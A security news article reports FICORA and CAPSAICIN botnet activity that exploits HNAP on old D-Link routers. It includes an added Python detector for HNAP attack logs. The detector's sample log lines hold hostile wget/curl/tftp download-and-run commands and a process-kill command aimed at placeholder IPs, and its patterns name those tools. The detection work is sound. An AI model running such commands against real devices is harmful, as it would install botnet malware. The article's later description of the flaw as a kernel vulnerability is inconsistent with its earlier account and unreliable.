Cyber Security News

New Botnet Exploiting D-Link Routers To Gain Control Remotely

Researchers observed a recent surge in activity from the “FICORA” and “CAPSAICIN” botnets, variants of Mirai and Kaiten respectively, which exploit known vulnerabilities in D-Link routers, including models running outdated firmware such as the DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.

The attackers abuse the HNAP protocol to execute commands remotely on vulnerable devices. Although the vulnerability has been known for years, the technique remains effective because many systems are still unpatched, which underlines the importance of timely firmware updates and robust security controls to mitigate these persistent threats.

Malicious “FICORA” command exploiting a D-Link vulnerability.

The attackers operate from servers located in the Netherlands and were responsible for activating the “FICORA” botnet, which affected a large number of countries around the world, indicating that the attack was not targeted.


Meanwhile, the “CAPSAICIN” botnet exhibited a more focused campaign, with intense activity concentrated in East Asian countries over two days, October 21st and 22nd, 2024.

The FICORA botnet is a Linux malware variant of the Mirai botnet; it downloads and executes the FICORA payload using various methods, including wget, ftpget, curl, and tftp.

Embedded hexadecimal script.

Before downloading different versions of itself that are designed to target different Linux architectures, the FICORA malware first eliminates processes that have the same file extension as itself. 

The malware uses ChaCha20 encryption to store its configuration, including the C2 server domain and a unique string.

It also includes a hard-coded username and password list for brute-force attacks and embeds a shell script to identify and kill processes containing the keyword “dvrHelper.”  

Hard-coded password list.
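The HNAP abuse, the wget/ftpget/curl/tftp download chain and the “dvrHelper” process-kill behaviour described above give a defender concrete tokens to hunt for in router or reverse-proxy logs. The following detector is an added example, not code from the article or from FortiGuard Labs; the log layout, the sample lines and the “/HNAP1/” endpoint path are assumptions.

```python
import re

# Constructed sample log lines (not from the article); the field layout is an assumption.
SAMPLE_LOG = """\
203.0.113.5 POST /HNAP1/ 200 "GetDeviceSettings"
203.0.113.9 POST /HNAP1/ 200 "cd /tmp; wget http://198.51.100.7/bin.sh; sh bin.sh"
198.51.100.23 GET /index.html 200 ""
203.0.113.9 POST /HNAP1/ 200 "tftp -g -r bin.sh 198.51.100.7; ftpget 198.51.100.7 bin.sh"
192.0.2.44 POST /HNAP1/ 200 "curl -O http://198.51.100.7/x86; pkill -f dvrHelper"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')
HNAP_PATH = "/HNAP1/"                              # HNAP endpoint path (assumed)
FETCH_TOOLS = ("wget", "ftpget", "curl", "tftp")   # downloaders named in the article
KILL_KEYWORD = "dvrHelper"                         # process the embedded script hunts
SHELL_CHAIN = re.compile(r"[;|`]|&&")              # command chaining metacharacters

def parse_line(line):
    """Split one log line into fields; None if it does not match the layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, path, status, excerpt = m.groups()
    return {"ip": ip, "method": method, "path": path,
            "status": int(status), "excerpt": excerpt}

def classify(entry):
    """Reasons an HNAP request looks like remote command execution; [] if none."""
    if not entry["path"].startswith(HNAP_PATH):
        return []  # only the HNAP endpoint is in scope for this rule
    body = entry["excerpt"]
    reasons = [f"fetch-tool:{t}" for t in FETCH_TOOLS if re.search(rf"\b{t}\b", body)]
    if KILL_KEYWORD in body:
        reasons.append(f"process-kill:{KILL_KEYWORD}")
    if reasons and SHELL_CHAIN.search(body):
        reasons.append("shell-chaining")
    return reasons

def scan(log_text):
    """Return (ip, excerpt, reasons) for every flagged request in the log."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            reasons = classify(entry)
            if reasons:
                findings.append((entry["ip"], entry["excerpt"], reasons))
    return findings
```

Requests on other paths are ignored on purpose, so a legitimate admin using wget elsewhere does not trigger the rule; the flagged client IPs are a starting point for blocking and for checking whether the device firmware is current.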

The CAPSAICIN malware is downloaded from a malicious server and targets various Linux architectures. Once running, it establishes a connection with its C2 server and sends information about the victim host.

It can kill processes of other botnets, set up environment variables, and launch DDoS attacks based on commands received from the C2 server, and it appears to be a variant of botnets developed by the Keksec group.

Malware version

FortiGuard Labs discovered that the malware families “FICORA” and “CAPSAICIN” actively exploit a decade-old, patched kernel vulnerability, highlighting the persistent danger of unpatched systems. 

Despite the vulnerability’s age, these attacks remain widespread, emphasizing the critical need for regular kernel updates across all enterprise devices. 

Comprehensive monitoring systems are also essential to detect and mitigate potential malware deployments exploiting this and other vulnerabilities.

By proactively implementing these security measures, enterprises can significantly reduce their exposure to this ongoing threat.

Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
